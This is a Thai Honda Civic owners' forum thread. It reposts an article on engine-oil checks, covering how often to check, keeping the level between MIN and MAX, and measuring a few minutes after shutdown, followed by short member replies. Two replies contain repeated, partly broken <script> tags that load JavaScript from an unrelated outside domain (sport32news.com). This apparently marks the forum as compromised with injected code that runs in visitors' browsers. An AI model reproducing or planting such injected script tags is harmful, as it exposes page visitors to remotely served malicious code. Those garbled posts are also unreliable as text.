ตอบ
Rachen


ชื่อเล่น: เชน

เข้าร่วม: 03 พฤศจิกา 2012
ตอบ: 1422

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1495
ให้คำขอบคุณ: 2881

ที่อยู่: บ้านฉาง ระยอง และ สตาร์พลาซ่า ระยอง
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 20 เมษา 2013 18:41 - วิธีการเช็ค ระดับน้ำมันเครื่องครับ อ่านเจอเลยเอามาฝากครับ
การวัดน้ำมันเครื่อง เรื่องง่าย...แต่มักละเลย หรือเข้าใจผิด !

การวัดน้ำมันเครื่อง เรื่องง่าย...แต่มักละเลย หรือเข้าใจผิด ! (thaidriver)

          การวัดน้ำมันเครื่อง...เหมือนจะง่าย แค่วัดและเติมให้ได้ระดับ แต่ในความเป็นจริงพบว่า หลายคนยังละเลย หรือวัดบ่อยตามสมควรจริง แต่ทำผิดวิธี น่าแปลกที่หลายคนเข้าใจว่าต้องรอข้ามคืน หรือหลายชั่วโมงแล้วจึงวัด ทั้งที่คู่มือประจำรถมักระบุชัดว่า "ให้วัดหลังดับเครื่องยนต์ที่ทำงานมาแล้วประมาณ 1-5 นาที หรือแค่ดับสักครู่" เท่านั้น เรื่องง่าย ๆ แต่หลายคนเข้าใจผิด นับเป็นตัวอย่างที่แสดงให้เห็นว่า หลายเรื่องที่คนเข้าใจเหมือนกันในวงกว้าง...อาจผิด และแสดงแบบเชื่อมโยงว่า...หลายคน (หรืออาจถึงขั้นส่วนใหญ่) ไม่อ่านคู่มือประจำรถ !

          การวัดน้ำมันเครื่องนับเป็นเรื่องที่หลายคนคิดว่าง่าย และมักมองข้าม จากอดีตแนะนำว่าควรวัดทุกวัน ปัจจุบันไม่ค่อยมีใครทำถี่ขนาดนั้น เพราะบางคนวัดแล้วก็ไม่เห็นพร่อง จึงคิดว่าทิ้งช่วงห่างได้ รถก็ไม่พัง จนหลายคนสงสัยว่า จริง ๆ แล้วควรวัดด้วยความถี่เท่าไร ? กี่วัน-กี่สัปดาห์ต่อครั้ง ? อีกเรื่องสำคัญคือ วิธีวัด หลายคนบอกว่าควรจอดนาน ๆ หรือข้ามคืนแล้วจึงวัด เพื่อให้น้ำมันเครื่องไหลกลับลงอ่างมากที่สุด หลายคนคิดว่าแปลก เพราะ หากต้องรอ 6-10 ชั่วโมงจริง ถ้าอยากวัดเองระหว่างวัน หรือหลังเติม จะทำอย่างไร ?

          น้ำมันเครื่องมีความสำคัญต่อเครื่องยนต์มาก เพราะไม่เพียงหล่อลื่น-ลดการสึกหรอ แต่ทำหลายอย่างควบคู่กันด้วย เช่น ระบายความร้อน, ป้องกันสนิม, ลดการกัดกร่อน ฯลฯ ดังนั้นควรใช้น้ำมันเครื่องคุณภาพดี ในปริมาณเหมาะสม และถูกต้อง คอลัมน์นี้เน้นเรื่องความถี่ และวิธีวัด 2 ประเด็น จึงขอข้ามเรื่องการเลือกเกรดคุณภาพน้ำมันเครื่อง เพราะเป็นเรื่องยาว และไม่เกี่ยวกันโดยตรง



          - ความถี่...ไม่ต้องทุกวัน แต่อย่าละเลย

          การวัดน้ำมันเครื่องมีความถี่เปลี่ยนไป จากอดีตมักแนะนำให้ทำประจำทุกวันหรือไม่กี่วันครั้ง เปลี่ยนเป็นสัปดาห์ละครั้ง บางคนเป็นเดือนหรือนานกว่านั้น ก็ไม่เห็นเครื่องยนต์มีปัญหา น่าจะเป็นเพราะเมื่อก่อนวัสดุที่ใช้ทำซีลปะเก็นต่าง ๆ อาจด้อยกว่าปัจจุบัน รวมถึงความห่างของชิ้นส่วนภายใน (เคลียร์แรนซ์) จากการผลิตก็มากกว่า เครื่องยนต์ยุคเก่าจึงอาจมีการลดลงของน้ำมันเครื่องเร็ว แตกต่างจากปัจจุบัน สังเกตได้จากเครื่องยนต์ยุคใหม่ถูกกำหนดให้ใช้น้ำมันเครื่องเบอร์ใสขึ้น จากความหนืด SAE ลงท้ายด้วย 40-50 กลายเป็น 30 หรือบางรุ่นในปี 2012 เป็นเบอร์ใสแค่ 20 ก็มี เครื่องยนต์ยุคเก่าเมื่อผ่านการใช้งานมาก ระดับน้ำมันเครื่องอาจลดอย่างรวดเร็ว ทั้งรั่วซึมภายนอก หรือเล็ดลอดสู่กระบอกสูบ แล้วเผาไหม้ออกพร้อมไอเสียเป็นควันขาว อาจเป็นที่มาของการแนะนำให้วัดน้ำมันเครื่องบ่อย ๆ ทุกวันหรือไม่กี่วันครั้ง เพราะเกรงว่าเครื่องยนต์จะพัง เนื่องจากน้ำมันเครื่องขาด ไม่พอต่อการหล่อลื่นและอื่นๆ



          - รักษาระดับ MIN-MAX อาจไม่ต้องเต็มเสมอ

          ปริมาณน้ำมันเครื่องมีผลต่อประสิทธิภาพในหลายหน้าที่  น้อยไปก็ไม่พอ มากไปก็สิ้นเปลืองและส่งผลลบ โดยมีปริมาณเป็นลิตร มาก-น้อยตามขนาดเครื่องยนต์ หรือความจุกระบอกสูบ-ซีซี เพราะเครื่องยนต์ใหญ่ มีอากาศและเชื้อเพลิงในกระบอกสูบ พร้อมเผาผลาญเป็นพลังงานมากกว่าเครื่องยนต์เล็ก จึงย่อมต้องการประสิทธิภาพการหล่อลื่นและอื่น ๆ มากกว่า น้ำมันเครื่องขาดอาจส่งผลให้เครื่องยนต์พัง

          ส่วนน้ำมันเครื่องเกิน ไม่พัง ถ้าเกินเล็กน้อย ประมาณ 0.5-1 เซนติเมตรของก้านวัด แม้ไม่ส่งผลเสียกับเครื่องยนต์ แต่ไม่ได้ประโยชน์และเปลืองเงิน เพราะน้ำมันเครื่องในปริมาณขีดบนของก้านวัด ก็เกินพอสำหรับหลายหน้าที่แล้ว  ถ้าเกินจากนั้น ระดับน้ำมันเครื่องที่สูงขึ้นในอ่าง อาจถูกเคาน์เตอร์เวทหรือตับเป็ดถ่วงสมดุลข้อเหวี่ยงตีสะบัดกระจายทั่ว ทั้งกินแรงในการตีจนเครื่องยนต์แรงตก และน้ำมันเครื่องอาจกระเซ็นโดนผนังกระบอกสูบมากกว่าปกติ ทำให้แหวนกวาดน้ำมันตัวล่างของลูกสูบทำงานหนัก จนน้ำมันเครื่องเล็ดลอดเข้าสู่กระบอกสูบ เผาไหม้เป็นควันขาว น่ารำคาญและสิ้นเปลืองโดยไม่จำเป็น

          การใช้งานควรรักษาระดับให้อยู่ช่วงขีดล่าง-บน หรือ Min-Max ของก้านวัดเสมอ ไม่จำเป็นต้องเต็ม แต่การเปลี่ยนน้ำมันเครื่องควรเติมให้ถึงขีดบน เพื่อไม่ต้องกังวลว่าจะลดต่ำกว่าขีดล่างหรือต้องวัดบ่อย ๆ ในช่วงแรกหลังเปลี่ยน (ระหว่างขีดบน-ล่าง มักต่างประมาณ 1 ลิตร) ส่วนเมื่อใช้งานสักระยะหรือใกล้เปลี่ยนน้ำมันเครื่อง ก็ไม่จำเป็นต้องเติมเพิ่มให้สิ้นเปลือง โดยไม่ต้องกังวลว่าเครื่องยนต์จะพัง เพราะถ้าไม่ต่ำกว่าขีดล่างก็ใช้งานได้ปกติ

          อย่าเข้าใจผิดว่าต้องมีน้ำมันเครื่องสูงถึงขีดบนเสมอ ไม่อย่างนั้นจะมีขีดล่างทำไม ? และเมื่อมีทั้งขีดบน-ล่าง แสดงว่าผู้ผลิตเผื่อให้แล้ว ไม่จำเป็นต้องเติมเผื่อให้เกินขีดสูงสุด นอกจากเป็นรถที่ใช้งานขึ้น-ลงเนินหรือมุมเอียงบ่อย จึงควรเติมให้ถึงขีดบนเสมอ เพราะระดับน้ำมันเครื่องอาจเอียงจนฝักบัวดูดอากาศผสมกันในบางจังหวะ

          ความถี่การวัดระดับน้ำมันเครื่องในปัจจุบัน หากวัดทุกครั้งแล้วพบว่ามีการลดระดับอย่างช้าๆ ตามปกติ (รวม 10,000 กม. ไม่ลดจากขีดบนจนต่ำกว่าขีดล่าง หรือสัปดาห์ละ 1-2 มม.) แนะนำให้วัด 1-2 สัปดาห์/ครั้ง หากละเลยก็อย่างน้อยเดือนละครั้ง แต่ไม่จำเป็นต้องทำถี่ทุกวันแบบอดีต



          - วิธีวัด แค่ดับเครื่องยนต์สักครู่ ไม่รอข้ามคืน

          นับเป็นปัญหาใหญ่ในวงกว้าง เพราะหลายคนเข้าใจผิด พร้อมปฏิบัติหรือแนะนำผิด ๆ ต่อเนื่องมานาน ทั้งที่เหมือนวัดง่าย ๆ แค่ดูหรือเติมให้ได้ระดับ ประเด็นสำคัญคือ ความเข้าใจผิดในวงกว้างฝังลึก ว่าต้องวัดน้ำมันเครื่องหลังดับเครื่องยนต์ไว้นานข้ามคืนหรือหลายชั่วโมง เพื่อให้น้ำมันเครื่องไหลกลับอ่างมากที่สุด หากวัดหลังดับเครื่องยนต์ใหม่ ๆ ต้องเผื่อระดับให้เห็นว่าต่ำกว่าปกติเล็กน้อย เพราะน้ำมันเครื่องยังไหลลงไม่หมด

          ไม่ทราบและไม่มีทางสรุปได้ว่า ทำไมหลายคนเข้าใจผิดและเป็นวงกว้างอย่างนั้นมานาน ? เดาว่าอาจเพราะหลายคนเข้าใจว่า น้ำมันเครื่องเป็นของเหลวเหนียว ๆ ข้นกว่าน้ำ เมื่อต้องไหลเวียนในเครื่องยนต์ไปทั่ว หลังดับเครื่องยนต์ก็ต้องมีน้ำมันเครื่องเหลือเกาะอยู่ต่างชิ้นส่วนต่าง ๆ มากมาย ยังไม่ไหลกลับลงอ่างด้านล่างจนหมด คิด(ผิด ๆ) ไปเองว่า หากวัดจะคลาดเคลื่อน หรือได้น้อยกว่าความเป็นจริง ทั้งที่ผู้ผลิตเครื่องยนต์ก็ทราบดี และได้เผื่อไว้แล้วว่า ถ้าวัดหลังดับเครื่องยนต์สักครู่ น้ำมันเครื่องควรจะมีระดับในช่วงใด ผู้ใช้หรือผู้วัดไม่ต้องคิดเผื่อแล้ว



          นับเป็นความเข้าใจและวิธีผิด เพราะคู่มือประจำรถเท่าที่เคยอ่าน และค้นหามาประกอบในคอลัมน์ทั้งญี่ปุ่น-ยุโรป เก่า-ใหม่ รถเก๋ง-รถกระบะ ล้วนระบุให้เครื่องยนต์ทำงานจนถึงอุณหภูมิปกติแล้วดับสักครู่ (น่าจะหมายถึง 1-5 นาที) หรือบางรุ่นระบุเป็นเลข 2, 3 และ 5 นาที อย่างชัดเจน เจ้าของบทความนี้ยังไม่เคยเห็นคู่มือประจำรถรุ่นใดระบุให้วัดหลังจอดข้ามคืน หรือรอนานหลายชั่วโมง

          ลองตั้งกระทู้ในเว็บไซต์ชื่อดัง พันทิพ-ห้องรัชดา ที่มีผู้คนหมุนเวียนเข้าไปร่วมแสดงความคิดเห็นมากมาย คนส่วนใหญ่เข้าใจผิดว่า ต้องวัดน้ำมันเครื่องหลังดับเครื่องยนต์ข้ามคืนหรือหลายชั่วโมง แม้มีการนำภาพสำเนาจากคู่มือประจำรถบางรุ่นมายืนยัน หลายคนก็ยังยึดติดกับความเชื่อเก่าที่ผิด

          การวัดแบบนี้ (รอประมาณ 1-5 นาที) ตรงกับความสะดวกในชีวิตจริง เพราะเมื่ออยากวัด ทั้งเจ้าของรถหรือช่างก็ทำได้ในเวลาสั้นหลังดับเครื่องยนต์ และไม่ต้องกะระดับเผื่อ
คิดง่ายๆ ว่า หากต้องรอข้ามคืนหรือกว่า 6 ชั่วโมง เมื่อเราอยากวัดทันที ก็ต้องอดใจรอ หรือหลังช่างเปลี่ยนน้ำมันเครื่อง และสตาร์ทเครื่องยนต์เพื่อให้หมุนเวียนเข้าสู่ไส้กรองตัวใหม่จนเต็มแล้วดับ ลูกค้าต้องรอช่างวัดระดับน้ำมันเครื่องอีก 6 ชั่วโมงอย่างนั้นหรือ ?

          อาจมีรถบางรุ่นแนะนำแตกต่างออกไป แต่ไม่น่ามีให้รอข้ามคืน เพราะช่างหรือผู้ใช้รถจะวัดลำบาก ดังนั้น ใครใช้รถรุ่นใดก็ควรอ่าน และทำตามคำแนะนำของรถรุ่นนั้น

          ควรวัดระดับน้ำมันเครื่องทุก 1 หรืออย่างห่างๆ ก็ 2 สัปดาห์ พร้อมสังเกตความผิดปกติของการพร่อง หาก 10,000 กม. ไม่ลดต่ำกว่าขีดล่างก็ดี แต่ถ้าต่ำกว่าก็ต้องตรวจการรั่วซึม ถ้าไม่รั่วก็อาจพิจารณาเปลี่ยนเบอร์หนืดขึ้น เมื่อใช้งานไปแล้วไม่จำเป็นต้องเติมเต็มขีดบนเสมอ หากไม่ต่ำกว่าขีดล่าง และต้องวัดหลังจากเครื่องยนต์ทำงานปกติ โดยดับทิ้งไว้สักครู่ 1-5 นาที ไม่ต้องรอข้ามคืน ยืนยันตามหลักการที่ถูกต้องในยุคนี้


ก้านวัดน้ำมันเครื่องก่อนเสียบวัด ควรเช็ดด้วยวัสดุที่สะอาด
                                 

หลายตัวอย่างสำเนาจากคู่มือประจำรถ ระบุให้วัดระดับน้ำมันเครื่องหลังดับเครื่องยนต์สักครู่


OUM


เข้าร่วม: 26 มิถุนา 2011
ตอบ: 2313

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2142
ให้คำขอบคุณ: 1465

ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 20 เมษา 2013 18:48 - วิธีการเช็ค ระดับน้ำมันเครื่องครับ อ่านเจอเลยเอามาฝากครับ
ความรูเมากเลย
ได้รับคำขอบคุณจาก: Rachen 
DuuI


ชื่อเล่น: ดุ่ย

เข้าร่วม: 02 สิงหา 2011
ตอบ: 1128

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1182
ให้คำขอบคุณ: 1536

ที่อยู่: วัดตะกล่ำ สวนหลวง ร.9
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 21 เมษา 2013 12:55 - วิธีการเช็ค ระดับน้ำมันเครื่องครับ อ่านเจอเลยเอามาฝากครับ
ตรวจสอบเป็นประจำอาทิตย์ละครั้งครับ ทั้งน้ำกลั่น หม้อน้ำ น้ำมันเครื่อง 

ทุกครั้งเวลาวัดน้ำมันเครื่องจะติดเครื่องยนต์ทิ้งไว้ประมาณ 5-10 นาที ดับเครื่องแล้ววัดระดับน้ำมันเครื่องครับ

 
ได้รับคำขอบคุณจาก: Rachen  หาดเจ้า 
horus


ชื่อเล่น: ต๋อย

เข้าร่วม: 18 เมษา 2013
ตอบ: 1272

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1777
ให้คำขอบคุณ: 1065

ที่อยู่: รามอินทรา / นนทบุรี / ES เมืองทอง
ปี: 2002
สี: ม่วง วินเทจพลัม (RP-32P)
จันทร์, 22 เมษา 2013 09:12 - วิธีการเช็ค ระดับน้ำมันเครื่องครับ อ่านเจอเลยเอามาฝากครับ
กระจ่างเลยคับ 
ได้รับคำขอบคุณจาก: Rachen 
Marwin


เข้าร่วม: 29 มกรา 2009
ตอบ: 1661

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1517
ให้คำขอบคุณ: 159

ที่อยู่: Seacon square
ปี: 2001
อังคาร, 23 เมษา 2013 08:14 - วิธีการเช็ค ระดับน้ำมันเครื่องครับ อ่านเจอเลยเอามาฝากครับ
อ่านจนเมื่อยตาเลย แต่เสริมความรู้ดี
ได้รับคำขอบคุณจาก: Rachen 
undertaker55


ชื่อเล่น: ต้อง

เข้าร่วม: 26 สิงหา 2012
ตอบ: 564

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 756
ให้คำขอบคุณ: 684

ที่อยู่: เชียงใหม่
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 23 เมษา 2013 08:32 - วิธีการเช็ค ระดับน้ำมันเครื่องครับ อ่านเจอเลยเอามาฝากครับ
ยาวมากมาย แต่ก้อ่านจนจบ
ได้รับคำขอบคุณจาก: Rachen 
chokpiti


ชื่อเล่น: โชค

เข้าร่วม: 17 ธันวา 2013
ตอบ: 1156

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1455
ให้คำขอบคุณ: 1837

ที่อยู่: มหาชัย-ระยอง
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 23 เมษา 2013 12:29 - วิธีการเช็ค ระดับน้ำมันเครื่องครับ อ่านเจอเลยเอามาฝากครับ
ถั่วต้มแล้วครับ
ได้รับคำขอบคุณจาก: Rachen 
OatCivic


ชื่อเล่น: โอ๊ตเตย

เข้าร่วม: 01 สิงหา 2012
ตอบ: 75

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 43
ให้คำขอบคุณ: 8

ที่อยู่: YoKoMoJi_Saraburi
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 18 กรกฎา 2013 08:13 - วิธีการเช็ค ระดับน้ำมันเครื่องครับ อ่านเจอเลยเอามาฝากครับ
ความรู้มากมายเลยครับ ตอนนี้กำลังประสบปัญหาน้ำมันเครื่องขาด อยู่พอดี แต่ไม่มีการรั่วซึม จะลองใช้เบอร์ที่หนืดขึ้นอีกหน่อย
ได้รับคำขอบคุณจาก: Rachen 
jagkrapongVilaikaew


ชื่อเล่น: โจ

เข้าร่วม: 09 มกรา 2011
ตอบ: 716

Guru ES
Guru ES

ได้รับคำขอบคุณ: 709
ให้คำขอบคุณ: 1961

ที่อยู่: นิคม 304 อ.ศรีมหาโพธิ จ.ปราจีนบุรี 25140
ปี: 2001
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 18 กรกฎา 2013 08:59 - วิธีการเช็ค ระดับน้ำมันเครื่องครับ อ่านเจอเลยเอามาฝากครับ
....
ได้รับคำขอบคุณจาก: Rachen 
Zenkii


ชื่อเล่น: มี่

เข้าร่วม: 21 ธันวา 2010
ตอบ: 403

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 586
ให้คำขอบคุณ: 922

ที่อยู่: ดอนเมือง หมู่บ้านศิริสุข หลักสี่ แจ้งวัฒนะ ถนนวิภาวดีรังสิต รังสิต Wash United Donmueang
พฤหัส, 18 กรกฎา 2013 09:05 - วิธีการเช็ค ระดับน้ำมันเครื่องครับ อ่านเจอเลยเอามาฝากครับ
เป็นความรู้ดีครับ แต่ผู้เขียนผมว่า มันเกริ่นเรื่องเยอะเกินไปจนน่ารำคาน เนื้อที่จะบอกว่าวัดยังไงหรือดูยังไงหรือวัดเมื่อไหร่จิงๆแล้วมีนิดเดียวเองที่เหลือเป็นน้ำทั้งนั้น เนื้อแทบไม่มี แต่บทความยาวมาก


ออกความเห็นในถานะนักอ่านนะครับ - -<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: Rachen 
nextseven


เข้าร่วม: 15 ธันวา 2012
ตอบ: 79

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 55
ให้คำขอบคุณ: 83

ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 18 กรกฎา 2013 11:43 - วิธีการเช็ค ระดับน้ำมันเครื่องครับ อ่านเจอเลยเอามาฝากครับ
ขอบคุณครับ
ได้รับคำขอบคุณจาก: Rachen 
Rachen


ชื่อเล่น: เชน

เข้าร่วม: 03 พฤศจิกา 2012
ตอบ: 1422

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1495
ให้คำขอบคุณ: 2881

ที่อยู่: บ้านฉาง ระยอง และ สตาร์พลาซ่า ระยอง
ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 18 กรกฎา 2013 11:57 - วิธีการเช็ค ระดับน้ำมันเครื่องครับ อ่านเจอเลยเอามาฝากครับ
"<script src="https://sport32news.com/civicesgroup.js">   ตอนนี้วัดบ่อยขึ้นครับปะเก็นรั่ว  รองบซ่อมอิอิ
nayyai1


เข้าร่วม: 01 กันยา 2010
ตอบ: 405

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 650
ให้คำขอบคุณ: 509

ที่อยู่: ระยอง ตอนนี้โคราชแล้ว
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 18 กรกฎา 2013 22:23 - วิธีการเช็ค ระดับน้ำมันเครื่องครับ อ่านเจอเลยเอามาฝากครับ
ความรู้ดีๆ  ขอบคุณมากครับ
 
ได้รับคำขอบคุณจาก: Rachen 
maxch


เข้าร่วม: 13 สิงหา 2009
ตอบ: 2190

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1513
ให้คำขอบคุณ: 2530

ที่อยู่: อยุธยา-สระบุรี
ปี: 2003
ศุกร์, 19 กรกฎา 2013 06:04 - วิธีการเช็ค ระดับน้ำมันเครื่องครับ อ่านเจอเลยเอามาฝากครับ
เอาแบบสรุปง่ายๆ ดีกว่า อ่านเยอะจัง
ได้รับคำขอบคุณจาก: Rachen 
i_Waii


ชื่อเล่น: หวาย

เข้าร่วม: 19 กรกฎา 2009
ตอบ: 467

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 239
ให้คำขอบคุณ: 451

ที่อยู่: ศาลายา นครปฐม
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 19 กรกฎา 2013 08:33 - วิธีการเช็ค ระดับน้ำมันเครื่องครับ อ่านเจอเลยเอามาฝากครับ
ผมละเบื่อเวลาไปถ่ายน้ำมันเครื่อง บอกเค้าแล้วนะว่าเติมพอดีนะพี่ สุดท้ายล่อซะหมดแกลลอน
ได้รับคำขอบคุณจาก: Rachen 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.